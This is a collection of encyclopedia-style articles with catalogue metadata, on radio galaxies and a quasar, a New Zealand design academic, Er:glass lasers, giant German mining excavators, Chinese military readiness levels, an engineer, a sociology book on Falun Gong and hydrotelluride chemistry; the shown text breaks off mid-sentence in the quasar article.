The supermassive black hole in 4C +29.30 has an estimated mass of 100 million times that of the Sun. Further study shows two jets of particles speeding away from the black hole at millions of miles per hour, each producing larger areas of radio emission located outside the galaxy. A pool of hot gas surrounds the black hole; some of this material will be consumed, and the magnetized whirlpool around it triggers more output into the radio jets in return. It is suggested that, by heating the surrounding gas into clumps and dragging cool gas along, the jets deprive the black hole of its fuel supply, keeping it "hungry".
4C +29.30 also contains a torus of dust and gas, which blocks optical light produced near the black hole. This suggests that 4C +29.30 belongs to the hidden/buried AGNs, a new class emerging among the Swift/BAT hard X-ray-selected AGNs.
References
Radio galaxies
Elliptical galaxies
Cancer (constellation)
4C objects
Seyfert galaxies
Principal Galaxies Catalogue objects
IRAS catalogue objects | 4C +29.30 | [
"Astronomy"
] | 1,761 | [
"Cancer (constellation)",
"Constellations"
] |
76,952,693 | https://en.wikipedia.org/wiki/Caroline%20McCaw | Caroline McCaw is a New Zealand design academic, and is a full professor at the Otago Polytechnic, specialising in incorporating storytelling and cultural values into design communication.
Academic career
McCaw completed a Master of Fine Arts at Otago Polytechnic, with a thesis based around a location-specific picnic event held at four locations simultaneously and incorporating a webcast from Amsterdam. She also completed a PhD, titled Identifying the Value of the Local Through Site-Specific Contemporary Art Projects in New Zealand, at Griffith University in Australia in 2016. Her thesis was supervised by Pat Heffie and Leoni Schmidt. McCaw then joined the faculty of Otago Polytechnic, rising to full professor.
McCaw was awarded a Ako Sustained Teaching Excellence award in 2014. The citation noted that she "excels in using collaborative processes to engage learners and connect her teaching to community development and industry outcomes". In 2016 she was awarded a Fulbright Fellowship to become a Scholar-in-Residence at SUNY Canton.
In 2015, McCaw collaborated with Jane Malthus, Glen Leyton and Margo Barton to produce an exhibition of Dunedin fashion, A Darker Eden, held at Silo Park in Auckland. The display built on Dunedin's neo-Gothic reputation, had over 3000 visitors, and featured fashion by Otago Polytechnic graduates alongside established labels NOM*d, Mild Red, Tanya Carlson and Company of Strangers, and a section on iD Dunedin Fashion Week. McCaw and Leyton also collaborated with students to produce an exhibition at Tūhura Otago Museum on WWI nurses from Otago.
Selected works
Malthus, Jane, McCaw, Caroline, Glen, Leyton and Barton, Margo. A Darker Eden, exhibition at Silo Park, Auckland, 13 Feb – 1 March 2015
McCaw, C., Glen, L., Oliver, M., Wilson, J., and Scott, C. Who Cared? Otago Nurses in WWI, exhibition at Otago Museum, 26 September 2015 – 31 January 2016
Malthus, J., McCaw C., Leyton, G., Barton M. (2015) Interplay and Inter-place: A collaborative exhibition addressing place-based identity in fashion design. International Association of Design Research Societies, Brisbane, Australia, 2 – 5 November
References
External links
Caro McCaw - Tertiary Teaching Excellence Award Winner, 7 July 2014, via YouTube
New Zealand academics
New Zealand women academics
New Zealand designers
Communication design
Academic staff of Otago Polytechnic
Living people
Year of birth missing (living people)
Otago Polytechnic alumni
Griffith University alumni | Caroline McCaw | [
"Engineering"
] | 504 | [
"Design",
"Communication design"
] |
76,953,328 | https://en.wikipedia.org/wiki/Er%3Aglass%20laser | An Er:glass laser (erbium-doped glass laser) is a solid-state laser whose active laser medium is erbium-doped glass. Ytterbium (Yb) is sometimes added to these lasers to improve their efficiency. Er:glass lasers emit light in the infrared region of the electromagnetic spectrum, often in the range of 1530–1560 nanometers.
Applications
The specific wavelengths that Er:glass lasers produce (approximately 1500 nanometers) coincide with a strong absorption peak for water. Since the human cornea and lens contain a high water content, they effectively absorb the laser radiation, thereby reducing the amount of light transmitted to the retina. The retina is the light-sensitive layer of the eye and is particularly vulnerable to damage from high-powered lasers. Consequently, Er:glass lasers are classified as relatively eye-safe compared to lasers operating at wavelengths that reach the retina. This relative eye safety allows Er:glass lasers to be used in many applications where eye safety is preferable or necessary, such as in medicine and in public areas.
Rangefinders
In addition to being relatively eye-safe, the 1500 nanometer wavelength that Er:glass lasers produce is also an ideal wavelength for laser rangefinders. It offers good transparency in the atmosphere, allowing the beam to travel long distances with minimal degradation. Additionally, this wavelength coincides with the peak sensitivity of certain infrared photodetectors that can operate at room temperature (including both indium gallium arsenide (InGaAs) and germanium (Ge)-based photodiodes).
The Er:glass lasers used in rangefinders typically emit short, high-energy Q-switched pulses of 1 to 10 millijoules. These lasers can measure distances up to 10 kilometers. The repetition rate, the frequency at which these pulses are emitted, depends on the pumping mechanism: flash-lamp-pumped devices without active cooling can only produce pulses every few seconds, while diode-array-pumped systems offer much faster repetition rates, reaching the 10–20 hertz range.
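The range measurement itself is a time-of-flight calculation: the rangefinder times the pulse's round trip and halves the light-travel distance. A minimal sketch of this arithmetic follows; the function name and timing value are illustrative.

```python
# Time-of-flight ranging: distance = c * round_trip_time / 2.
C_M_S = 299_792_458.0  # speed of light in m/s

def range_from_echo_m(round_trip_s: float) -> float:
    """Target distance in metres from the pulse round-trip time."""
    return C_M_S * round_trip_s / 2.0

# A target ~10 km away returns its echo after about 66.7 microseconds
print(f"{range_from_echo_m(66.7e-6) / 1000:.2f} km")  # → 10.00 km
```

Since each round trip at the maximum range takes well under a millisecond, even the faster 10–20 Hz repetition rates leave ample time between pulses.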
Laser skin resurfacing
Er:glass lasers are used for non-ablative laser skin resurfacing procedures, such as Fraxel Restore. The 1540 nanometer wavelength is highly absorbed by water molecules within the skin tissue. This absorption heats the water molecules, creating controlled thermal damage (thermolysis) in the upper dermis. This thermal damage stimulates the skin's natural wound healing response, promoting the production of new collagen fibers. By stimulating collagen production, Er:glass laser treatment aims to improve the appearance of fine lines, wrinkles, and uneven skin tone without completely removing the top layers of skin. This approach is considered to be a gentler alternative to ablative laser resurfacing techniques, typically resulting in shorter healing times and a reduced risk of scarring.
References
Solid-state lasers
Medical equipment
Laser medicine
Erbium | Er:glass laser | [
"Chemistry",
"Biology"
] | 614 | [
"Medical equipment",
"Solid state engineering",
"Solid-state lasers",
"Medical technology"
] |
76,953,474 | https://en.wikipedia.org/wiki/Type%20SRs%208000%20bucket-wheel%20excavator | The Type SRs 8000 or less commonly known as the SRs 8000-class, is a family of bucket-wheel excavators known for being one of the largest terrestrial vehicles ever made by man, with Bagger 293 its - "lead vessel" - being the largest ground vehicle in history. The Type SRs 8000 classification was coined by TAKRAF to describe specifically, Bagger 293, although it is unclear if this extends to its other "sibling vehicles" within the same bulk.
While the "Bagger" family name may suggest a series of copies of the same vehicle type, it is more of a loose denominator grouping BWEs of similar bulk, length, height and size at the Hambach surface mine. Indeed, some of the Baggers are not of the same size or construction period, nor even built by the same manufacturer: Bagger 293 and Bagger 288, for example, were constructed by TAKRAF and Krupp respectively.
Specifications
As aforementioned, the one factor that unites them all is their size. All members of the Type SRs 8000 weigh at a bare minimum over 7,000 tons. The smallest and oldest of the family, Bagger 281 (built in 1958), weighs over 7,800 tons, although the average weight is around 13,000 tons. Likewise, all members reach lengths of over 200 meters and require a small crew of five. At such a size, these vehicles carry their own on-board toilet and kitchenette rooms.
As BWEs, the Type SRs 8000s are all externally powered from a nearby coal production plant, with an internal 6,413 kW (8,600 hp) electric motor keeping the machine operating smoothly. On average, a Bagger requires a total output of 16.56 MW (22,207 hp) to function with all systems running. Their primary role as BWEs is excavating lignite coal in Germany for processing into energy, or moving up to 240,000 cubic metres of overburden daily.
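The quoted kilowatt and horsepower pairs can be cross-checked with the standard mechanical-horsepower conversion (1 hp ≈ 745.7 W); both pairs in the text round-trip almost exactly, as this small sketch shows.

```python
# Cross-check the text's kW <-> hp figures using mechanical horsepower
# (1 hp = 745.7 W, a standard conversion factor).

KW_PER_HP = 0.7457

def kw_to_hp(kw: float) -> float:
    """Convert kilowatts to mechanical horsepower."""
    return kw / KW_PER_HP

print(round(kw_to_hp(6_413)))    # internal motor: ~8,600 hp
print(round(kw_to_hp(16_560)))   # 16.56 MW total output: ~22,207 hp
```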
Currently, all Type SRs 8000s are in-service. They are Bagger 281 (1958), Bagger 285 (1975), Bagger 287 (1976), Bagger 288 (1978), Bagger 291 (1993) and Bagger 293 (1995).
Gallery
See also
List of largest machines
Bucket-wheel excavators
Landships
Bagger 288
Bagger 293
References
Bucket-wheel excavators
Coal mining in Germany
RWE
Buildings and structures in Rhein-Erft-Kreis
Economy of North Rhine-Westphalia
Takraf GmbH | Type SRs 8000 bucket-wheel excavator | [
"Engineering"
] | 537 | [
"Mining equipment",
"Bucket-wheel excavators"
] |
76,953,497 | https://en.wikipedia.org/wiki/Type%20Es%203750%20bucket%20chain%20excavator | The Type Es 3750 or simply the Es 3750 is a series of bucket chain excavators built by TAKRAF and used in Germany. According to TAKRAF, they boast that the Type Es 3750 is the largest bucket chain excavators in the world. Type Es 3750s are notable for being always used in conjunction with the Overburden Conveyor Bridge F60, another absurdly large land vehicle.
Specifications
The Type Es 3750 are immense digging machines, the largest of their kind according to TAKRAF. Each Type Es 3750 has a total length of , a height of and a weight of . The cutting height of the BCE's chain boom is to , whilst its cutting depth is to . In total, the chain boom is capable of excavating a maximum of 14,500 m3/h. The buckets themselves are reinforced with 5 to 10 mm steel plates to prevent deformation and wear.
A unique design choice of the Type Es 3750 is the presence of two operator cabs, one projecting outwards on each side of the machine. Given that it predominantly moves side-to-side with the F60, this is to be expected. It likewise carries a small crew of around 2–5. Another unique feature is that the Type Es 3750 runs on rails; since it works closely alongside the F60, it shares the same gauge as the F60 - . The vehicles also share their power source, the nearby external coal power plant, and therefore move at the same speed as the F60.
Operations
The Type Es 3750 was built at almost exactly the same time as the F60s, in 1978 in East Germany. Each F60 was expected to be accompanied by two Type Es 3750 to assist in transferring overburden and lignite coal: one Type Es 3750 excavates the topside whilst the other excavates the depths. Excavated material is transported on side conveyors to the F60 for redistribution. As there were originally five F60s, a total of 10 Type Es 3750 BCEs were built, but with the retirement of one of the F60s in Lichterfeld-Schacksdorf, only 8 remain in service.
Gallery
References
Engineering vehicles
Mining equipment
Surface mining
Surface mines in Germany
Takraf GmbH
Excavators
Dredgers | Type Es 3750 bucket chain excavator | [
"Engineering"
] | 521 | [
"Engineering vehicles",
"Mining equipment"
] |
76,953,946 | https://en.wikipedia.org/wiki/Type%20SRs%202000%20bucket-wheel%20excavator | The Type SRs 2000 (or Type SRs (K) 2000 in China) is a class of medium-sized bucket-wheel excavators built by TAKRAF. It is by far, one of the most common and recognizable BWEs built and sold by TAKRAF, with 56 Type SRs 2000s being commissioned and launched as of 2013.
Specifications
It is a medium-sized BWE reaching dimensions of , a length of , a width of and a height of ; its ground pressure is much lower than that of a D11 dozer. It was built to replace the aging Type SRs 1200 BWEs, with more efficient and cost-saving power lines and conveyor-belt drive systems. The Type SRs 2000 is powered by at least four electric motors with a 20–30 kV trailing cable, and whilst it is externally powered like all BWEs, its total operational power is currently unknown.
The bucket wheel is in diameter with 14 buckets. It is able to excavate a total capacity between 4,900 and 7,000 m3/h with a digging force of around 100 kN/m. The excavator reaches a digging height of 30 m with a cutting depth of −10 meters.
Although construction of the Type SRs 2000 began in 1989, with one of the first batches sent to Ekibastuz in the then Kazakh SSR (USSR), official global commissioning and serialization only began in 2008, with the China-export model, the Type SRs (K) 2000, commissioned in 2013. The export model has a slight modification allowing the BWE to withstand temperatures varying from +39 °C down to −39 °C, which is needed given the wide temperature swings in Inner Mongolia.
Current and former operators
(former)
(former)
See also
List of largest machines
Bucket-wheel excavators
Landships
Type SRs 8000
References
Bucket-wheel excavators
Coal mining in Germany
RWE
Takraf GmbH | Type SRs 2000 bucket-wheel excavator | [
"Engineering"
] | 418 | [
"Mining equipment",
"Bucket-wheel excavators"
] |
76,954,017 | https://en.wikipedia.org/wiki/Samsung%20Galaxy%20M34%205G | Samsung Galaxy M34 is a mid-range smartphone from Samsung M Series released in July 2023. Samsung Galaxy M34 5G mobile was launched on 7 July 2023. The phone comes with a 120 Hz refresh rate 6.50-inch touchscreen display offering a resolution of 1080x2400 pixels (FHD+). Samsung Galaxy M34 5G is powered by an octa-core processor, Exynos 1280 based on 5nm manufacturing process. It comes with 6GB, 8GB of RAM. The Samsung Galaxy M34 5G runs Android 13 and is powered by a 6000mAh non-removable battery. The Samsung Galaxy M34 5G supports proprietary fast charging.
As far as the cameras are concerned, the Samsung Galaxy M34 5G on the rear packs a triple camera setup featuring a 50-megapixel primary camera, and an 8-megapixel camera. It has a single front camera setup for selfies, featuring a 13-megapixel sensor.
The Samsung Galaxy M34 5G runs One UI 5, based on Android 13, and packs 128GB or 256GB of inbuilt storage. It was launched in Midnight Blue, Prism Silver, and Waterfall Blue colours.
The phone is upgradeable to One UI 6.1 based on Android 14.
References
Samsung smartphones | Samsung Galaxy M34 5G | [
"Technology"
] | 276 | [
"Crossover devices",
"Phablets"
] |
76,954,632 | https://en.wikipedia.org/wiki/4C%20%2B48.48 | 4C +48.48 is a radio galaxy located in the constellation Cygnus. At the redshift of 2.343, it is one of the most distant galaxies ever seen, since light has taken at least 11 billion light-years to reach Earth.
History
4C +48.48 is believed to be a precursor of today's brightest cluster galaxies and an important probe of galaxy evolution. It is one of many powerful high-redshift radio galaxies with recent detections of strong emission lines at observed wavelengths, which provide a new diagnostic tool to study these objects, although the nature of the line emission remains a subject of debate. Part of the difficulty may be that the standard optical emission-line ratios commonly used to differentiate between thermal ionization and low- or high-excitation ionization from a nonthermal source have, until recently, been hard to apply, because the rest-frame optical emission from galaxies at z > 1 is redshifted to near-infrared wavelengths at the current epoch.
A new generation of infrared spectrographs has made it possible to begin systematic studies of the dominant ionization mechanisms in these galaxies via their rest-frame optical emission-line spectra. In particular, the new K-band spectrograph on the University of Hawaii 2.2 m telescope on Mauna Kea provides the unique capability of simultaneous coverage of the 1.0–2.4 μm wavelength band at a typical spectral resolution λ/Δλ ≈ 700, while the infrared spectrograph (CGS4) on the 3.8 m United Kingdom Infrared Telescope (UKIRT) on Mauna Kea can cover either the full J-, H-, or K-band near-infrared window at a spectral resolution of λ/Δλ ≈ 860.
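Resolving power is conventionally R = λ/Δλ, so the wavelength resolution element these spectrographs deliver follows directly as Δλ = λ/R. The sketch below takes the quoted resolving powers of roughly 700 and 860; the sample wavelengths (K band ~2.2 μm, J band ~1.25 μm) are illustrative assumptions.

```python
# Wavelength resolution element from resolving power: dlam = lam / R.
# R values follow the text; the sample wavelengths (K band ~2.2 um,
# J band ~1.25 um) are assumed for illustration.

def resolution_element_nm(wavelength_um: float, resolving_power: float) -> float:
    """Return the resolution element in nanometers."""
    return wavelength_um / resolving_power * 1000.0  # um -> nm

print(round(resolution_element_nm(2.2, 700), 2))   # ~3.14 nm in the K band
print(round(resolution_element_nm(1.25, 860), 2))  # ~1.45 nm in the J band
```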
Further study on 4C +48.48
A study of 4C +48.48 conducted in 2001 shows that although its dominant ionization mechanism is photoionization by the central active galactic nucleus, there is evidence of another mechanism in the off-nuclear emission of each source. Measurements of [O II], [Ne III] and [O III] for several regions in 4C +48.48 suggest shock ionization in one region.
Further observations with the PPAK bundle of the PMAS spectrograph mounted on the 3.5 m telescope at the Calar Alto Observatory show that various emission lines are detected within this wavelength range for 4C +48.48, including Lyα (1216 Å), NV (1240 Å), CIV (1549 Å), HeII (1640 Å), OIII] (1663 Å) and CIII] (1909 Å). The Lyα, CIV and HeII emission lines in 4C +48.48 show a striking morphology, extending several arcseconds towards the north-east in close alignment with the radio source. On the other side of the nucleus, however, this alignment is absent: the south-western radio source undergoes a dramatic 45 deg bend to the south, with its line emission extending ~5 " (40 kpc) from the nucleus towards the west. The CIV and HeII lines show a spatial distribution similar to that of Lyα.
The properties above suggest 4C +48.48 is embedded in a large ionized gas nebula whose Lyα emission extends across ~100 kpc or more. Moreover, there is a band of low Lyα/CIV running perpendicular to the radio axis at the location of the active nucleus, which might be the observed signature of an edge-on disk of neutral gas.
Weaker lines are also detected in the deep spectra of 4C +48.48. Based on comparisons between various ionization models and emission-line ratios, the line-emitting gas is found to be enriched with metals and ionized by the hard radiation field of the active nucleus.
In another study, using deep spectroscopy of the ultraviolet (UV) line and continuum emission obtained with Keck II and the Very Large Telescope, researchers investigated the nature of jet–gas interactions in 4C +48.48. The kinematically perturbed gas was found to be blueshifted with respect to the kinematically quiescent gas, spatially extended, and detected on both sides of the nucleus. It is proposed that the perturbed gas is part of a jet-induced outflow, with dust on the far side of the object obscuring the outflowing gas. The spatial extent of the blueshifted perturbed gas is typically ~35 kpc, implying that the dust is spatially extended on similar scales.
References
Cygnus (constellation)
Radio galaxies
Principal Galaxies Catalogue objects
4C objects | 4C +48.48 | [
"Astronomy"
] | 985 | [
"Cygnus (constellation)",
"Constellations"
] |
76,958,638 | https://en.wikipedia.org/wiki/Frederick%20Snare | Frederick Snare (December 4, 1862September 27, 1946) was an American engineer and international construction contractor.
Career
After an unsuccessful contracting business in 1885 in Huntingdon, he relocated to Philadelphia and established a new contracting firm. Frederick Snare and Wolfgang Gustav Triest established the Snare & Triest Company in 1898. The Snare & Triest Company was incorporated in 1900, with Snare as the President, and became the Frederick Snare Corporation in the 1920s. Snare's company operated in the United States, Cuba, Peru, Argentina, Colombia, and Panama. It grew to become one of Latin America's major contractual engineering firms.
In Havana, he constructed a country club after a group of American and British residents, led by Snare, arrived in 1911 and purchased an estate in Marianao. The original country club that Snare had established was renamed the Havana Biltmore Yacht and Country Club by the 1930s.
Golf
In 1922 and 1925, he won the Seniors' Golf Championship, an annual tournament of the United States Seniors Golf Association. Snare was a member of the Garden City Golf Club and National Golf Links of America. In 1927, he captained the United States Expeditionary Golf Forces at the first annual triangular international tournament in England.
Death
Frederick Snare died on September 22, 1946, at the Anglo-American Hospital in Havana, Cuba.
References
1862 births
1946 deaths
Civil engineers
American civil engineers
Engineers from Pennsylvania
Civil engineering contractors
American civil engineering contractors
American bridge engineers | Frederick Snare | [
"Engineering"
] | 308 | [
"Civil engineering",
"Civil engineering contractors",
"Civil engineers"
] |
76,958,948 | https://en.wikipedia.org/wiki/Becoming%20Activists%20in%20Global%20China | Becoming Activists in Global China: Social Movements in the Chinese Diaspora is a non-fiction book by Andrew Junker, an adjunct assistant professor in sociology at the Chinese University of Hong Kong. Published by Cambridge University Press in 2019, the book is a sociological study of the Falun Gong movement and the post-1989 democracy movement (Minyun), both suppressed in China. By comparing these two movements from a social movement perspective, Junker argued that Falun Gong's more enduring mobilization results from its decentralized organizational structure and demonstrates the potential for progressive social change.
Background
Junker holds a Ph.D. in sociology from Yale University and is the Hong Kong Director of the Yale-China Association. He also has academic degrees in religious studies and East Asian studies. His papers have been published in Mobilization, Sociology of Religion, and the American Journal of Cultural Sociology.
The book is based on Junker's research of Falun Gong and the democracy movement through interviews and observations in the United States, Japan, Taiwan, and Hong Kong, conducting field visits from 2006 through 2015 and analyzing materials from archives and organizational publications. He employed quantitative narrative analysis to dissect the information collected.
Content
Junker's comparative analysis highlights how Falun Gong and Minyun navigated and resisted the Chinese Communist Party (CCP) from within the global Chinese diaspora. He frames Falun Gong not just as a religious movement but also as a social movement. It is the first purely sociological study of Falun Gong's resilience.
Drawing on academic research, Junker identified similarities between the two movements, such as their reliance on digital media and transnational activities. He found that Falun Gong, in contrast to Minyun, succeeded by adopting "a diffuse, decentralized, and bottom-up approach motivated by Falun Gong's religious ethic of activism" in terms of participants, protests, progressive potential, and global political impact.
Junker observed that Minyun activism adhered to established Chinese norms of authority, with protests enacted as confrontations between counter-elites and authorities. In contrast, Falun Gong's activism broke with tradition through "its grassroots-based, diffuse nonviolent protest campaigns" to leverage public opinion and resources to pressure authorities.
Junker argued Falun Gong's activism contributes to progressive social change. Regardless of the ideology, the protest mobilization to defend freedom of religion has a "progressive character" central to liberal democratic modernity. Its grassroots activism was "so decentralized and emphasized individual initiative" with a spillover effect on the Chinese dissidents and diaspora community.
Reception
The book is recognized for its theoretical contributions and ability to bridge the study of new religious movements with broader sociopolitical analysis. It is considered essential reading for scholars interested in the Chinese diaspora, social movements, and the intersection of religion and politics in contemporary China.
Chengpang Lee from the National University of Singapore criticized Junker's claims that Falun Gong has seen a reduction in politicization since 2000, and noted that Junker did not fully discuss the fact that Falun Gong published the "Nine Commentaries on the CCP" in 2004 and subsequently launched a campaign encouraging people to withdraw from CCP membership. Lee also argued that Junker did not fully address the role of Li Hongzhi's leadership in the movement, and their usage of traditional Chinese cultural elements such as symbols of the Tang dynasty.
In 2020, the book won the Honorable Mention for the Asia/Transnational Book Award by the American Sociological Association's Asia and Asian America Section.
See also
The Religion of Falun Gong
Falun Gong and the Future of China
Qigong Fever: Body, Science, and Utopia in China
References
Sociology
Political sociology
Asian studies
Democracy movements
Political science
Social movements
Books about China
Books about Falun Gong
Cambridge University Press books | Becoming Activists in Global China | [
"Biology"
] | 777 | [
"Behavioural sciences",
"Behavior",
"Sociology"
] |
76,966,654 | https://en.wikipedia.org/wiki/People%27s%20Liberation%20Army%27s%20Combat%20Readiness%20Levels | The PLA's combat readiness level (中国人民解放军战备等级) is the alert awareness system used by the People's Liberation Army to signal the PRC's combat readiness posture (similar to the American DEFCON system). Different readiness levels activate different set of preparatory actions by the PLA. The system has four levels, with One being the highest (possible war imminent) and Four the lowest. It is the Central Military Commission's responsibility (through the JOCC) to call changes in the readiness level. At different levels, the People's Liberation Army takes different actions to deal with different degrees of emergency.
China uses other readiness systems, such as the Firefighting Action Readiness system, and the Militia's three-level readiness system.
System levels
The PLA's combat readiness system is divided into four levels. Each level has clearly indicated measures and actions of mobilization that the PLA needs to take to face the crisis. The CMC assesses the impact of foreign military activities, and the likelihood of China being attacked.
Different combat readiness levels may apply only to specific areas, or to specific services and arms of the PLA. In case of localized threats, high levels may apply to a district and not to others.
The measures or actions required by the PLA's combat readiness level range from very basic, such as conducting combat readiness inspections, strengthening patrols, and keeping communications open, to highly strict and urgent measures of mobilization and preparation for a shooting war if the emergency is deemed to require it.
Contrary to the DEFCON system, a state of complete defense normality does not have a readiness number, and level 1 does not imply the near-certainty of a shooting war. The PLA's military doctrine explicitly recommends the use of readiness signalling as a form of deterrence.
The standard conditions for each of the readiness levels are as follows:
The readiness system is not used in situations of low international tension. It can be raised by one step or by several steps depending on the changing international situation.
History
Since the establishment of the PLA's combat readiness level system, the CRL has been raised several times.
Taiwan Strait Crisis (1996)
In 1995, Republic of China president Lee Teng-hui visited the US in an official capacity. The PRC government decided to carry out two large-scale missile test operations around the island of Taiwan to deter any further moves. The US reacted by sending two 7th Fleet carrier groups through the Taiwan Strait. In response, the CMC raised the Nanjing Military Region to level one.
"Two Countries" Thesis
In 1999, then President of the Republic of China Lee Teng-hui declared the "Two Countries" thesis, which seemed to support independence. Forces in Fujian were raised to level 3 readiness.
Hainan Island incident
On 1 April 2001, an American EP-3 Aries SIGINT plane collided midair with a J-8II interceptor south of Hainan. The Chinese pilot died and the American plane was forced to land on Hainan island. PLA forces were placed on level 1 readiness for a short period, until negotiations started with the US.
2004 Republic of China Elections
In 2004, ROC president Chen Shui-bian was seeking reelection. For over a year before the election, PLA forces on the Taiwan Strait were kept at state 2.
2008 Republic of China elections
For the 2008 ROC elections, the readiness level of the forces on the strait was raised to level 1.
2011 Kashgar Terrorist Attacks
On 30 July 2011, double attacks in the city of Kashgar, Xinjiang province, resulted in the declaration of a level 1 event, and martial law was imposed in the region to preempt any further unrest.
2011 Kim Jong-Il's death
On 17 December 2011, to deal with the uncertainty associated with the sudden death of North Korean leader Kim Jong-il, the CMC raised the readiness state to 3 on the Sino-Korean border.
2013 Korean Peninsula Crisis
On 12 February 2013, North Korea decided to disregard international opposition and restart nuclear testing, and on 5 March of the same year it declared its intention not to be bound by the Korean Armistice (for the sixth time). In the face of North Korea's hardline attitude, the PRC mobilized extra troops to its border and declared readiness condition 1 for the border area.
Galwan Valley Skirmishes
In 2020, as a result of the Galwan Valley skirmishes and consequent border tensions, the readiness level was raised to level 3 for the Xinjiang and Tibet Military Districts. The level was further raised to level 2 after actual shooting was reported.
References
See also
Joint Operations Command Center
Military of the People's Republic of China
Alert measurement systems | People's Liberation Army's Combat Readiness Levels | [
"Technology"
] | 965 | [
"Warning systems",
"Alert measurement systems"
] |
76,967,168 | https://en.wikipedia.org/wiki/Reteh-qabet | Reteh-qabet (sometimes Reteh-kabet) is referred to in Egyptian mythology and astronomy as the boundaries of the heavens. The meaning "that pushes the chest back" can be compared to the breathing process and refers specifically to breathing shortly before birth or shortly before death. The associated entry into the means "beginning of life", while the entry into the means impending death.
Background
The Reteh-qabet is the beginning of a region of absolute darkness, understood as the edge of the sky and as the "back of Nut". It is the transition area to Keku-semau, the primordial darkness, which is also considered the top of the sky. In the Book of Nut, the Reteh-qabet is described as a region "in which Re never rises". It is considered the limit of the four cardinal directions, which lie simultaneously in the primordial waters Nu and lose their meaning outside the Reteh-qabet, since it is "the place without directions". The mythological ideas of the Egyptians come close to the modern conception of the universe, in which the Earth's familiar three dimensions of length, width and height are no longer the sole valid frame of description.
Literature
: Floor plan of the course of the stars – the so-called Book of Nut. The Carsten Niebuhr Institute of Ancient Eastern Studies (among others), Copenhagen 2007, ISBN 978-87-635-0406-5, p. 141.
References
Egyptian mythology
Locations in Egyptian mythology
Astronomy in Egypt
Ancient astronomy | Reteh-qabet | [
"Astronomy"
] | 341 | [
"Ancient astronomy",
"History of astronomy"
] |
76,967,306 | https://en.wikipedia.org/wiki/Hydrotelluride | A hydrotelluride or tellanide is an ion or a chemical compound containing the [HTe]− anion which has a hydrogen atom connected to a tellurium atom. HTe is a pseudohalogen. Organic compounds containing the -TeH group are called tellurols. "Tellanide" is the IUPAC name from the Red Book, but hydrogen(tellanide)(1−) is also listed. "Tellanido" as a ligand is not named, however ditellanido is used for HTeTe−.
Hydrotellurides are usually unstable at room temperature.
List
References
Tellurium(II) compounds
Anions | Hydrotelluride | [
"Physics",
"Chemistry"
] | 140 | [
"Ions",
"Matter",
"Anions"
] |
76,969,345 | https://en.wikipedia.org/wiki/I%20Zwicky%201 | I Zwicky 1 (shortened to I Zw 1), also known as UGC 545, is a galaxy located in the constellation Pisces. It is located 847 million light-years from Earth and is said to be the nearest quasar (QSO) due to its high optical nuclear luminosity of MV = -23.8 mag.
Discovery
I Zwicky 1 was discovered by Fritz Zwicky in 1964. Zwicky classified the object as a compact galaxy, commenting that it is "variable blue spherical, very compact, with a patchy halo". It is listed as the first object in the Zwicky catalogue. At a redshift of 0.0611, I Zwicky 1 shows spectral properties of high-redshift quasars, with features blueshifted by 1,350 km s−1 according to a study by Buson & Ulrich in 1990.
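The quoted distance of 847 million light-years is roughly what a simple low-redshift Hubble-law estimate, D ≈ cz/H0, gives for z = 0.0611. The sketch below assumes H0 = 70 km s−1 Mpc−1 (a round value, not from the article), so the result is only approximate.

```python
# Low-redshift distance estimate: D = c*z / H0.
# z follows the text; H0 = 70 km/s/Mpc is an assumed round value, so
# the answer only approximately reproduces the quoted 847 Mly.

C_KM_S = 299_792.458     # speed of light, km/s
H0 = 70.0                # Hubble constant, km/s/Mpc (assumption)
MLY_PER_MPC = 3.2616     # million light-years per megaparsec

z = 0.0611
d_mpc = C_KM_S * z / H0
d_mly = d_mpc * MLY_PER_MPC
print(round(d_mpc), round(d_mly))  # ~262 Mpc, ~853 Mly
```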
The photometric history of I Zwicky 1 dates back to 1909, when it was investigated on Harvard photographic plates. The available data indicate the galaxy is variable and probably undergoes outbursts of about 0.7 mag above a brightness level that is itself variable by about 0.7 mag.
Characteristics
The nucleus of I Zwicky 1 is active. It is classified as a prototypical narrow-line Seyfert 1 galaxy with high X-ray luminosity. The galaxy has a peculiar spectrum: in addition to the usual broad- and narrow-line regions, there are two emission regions emitting broad, blueshifted [O III] lines, making it a peculiarly interesting object. The QSO sits inside a host galaxy revealed to be a face-on spiral, showing two asymmetric spiral arms and knots of star formation. This makes I Zwicky 1 an ideal candidate for studying the properties of QSO hosts. It is also possible that tidal interactions trigger activity in I Zwicky 1, both starburst and QSO.
I Zwicky 1 is classified as a Markarian galaxy (designated both Mrk 1502 and Mrk 9009). Compared to other galaxies, the nucleus emits excessive amounts of ultraviolet light, caused by a strong starburst in the central ring-like area of the galaxy.
Further study on I Zwicky 1
I Zwicky 1 has been imaged in the V, R, and H bands and shows strong carbon monoxide (CO) emission in the J = 1-0 and J = 2-1 lines. When further observed, researchers found that the J = 1-0 line is brighter than the less luminous J = 2-1 line. Given the conditions in galactic molecular clouds, the CO emission must be extended on the scale of the 26 kpc J = 1-0 beam size, with appreciable optical depth, and thermalized.
Researchers studying the interstellar medium and star formation found that a two-component model is required for I Zwicky 1, in which two-thirds of the far-infrared brightness originates in the disk and one-third in the nucleus. The star-forming rate and efficiency of the disk and the nucleus of I Zwicky 1 were estimated, and the values are similar to those of galaxies studied by IRAS. Overall, the disk star formation is close to the topmost values of ~30 L☉/M☉ found in galactic star-forming regions of the Milky Way such as M17 or W51. Analysis of the nuclear near-infrared colors suggests I Zwicky 1 has a combined quasar nucleus and an inactive stellar component contributing about 10 to 20% of the flux density at 2.2 microns, and that the size of I Zwicky 1's molecular bulge is 1″ to 2″ (1.2-2.4 kpc). Only the nucleus, however, is revealed by the optical spectrum and large X-ray luminosity.
Millimeter Spectroscopy
Further studies mapped the 12CO (1-0) line emission in I Zwicky 1: researchers conducted observations with the Institut de radioastronomie millimétrique (IRAM) millimeter interferometer on the Plateau de Bure, France, between January and February 1995, placing four 15 m antennas in four different configurations. The 24 baselines provided by the four antennas, ranging from 24 to 288 m in length, were fed by SIS receivers with single-sideband (SSB) system temperatures of 170 K above the atmosphere. At redshift 0.0611, the observed frequency for I Zwicky 1 was 108.633 GHz.
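The 108.633 GHz observing frequency follows from redshifting the CO(1-0) rest frequency, ν_obs = ν_rest/(1+z). The rest frequency of 115.271 GHz is a standard literature value, not stated in the article; with the quoted z it reproduces the observed frequency to within rounding.

```python
# Observed frequency of a redshifted spectral line:
#   nu_obs = nu_rest / (1 + z).
# The CO(1-0) rest frequency (115.271 GHz) is a standard value assumed
# here; the redshift follows the text.

NU_REST_CO10 = 115.271  # GHz, standard CO(1-0) rest frequency
z = 0.0611

nu_obs = NU_REST_CO10 / (1 + z)
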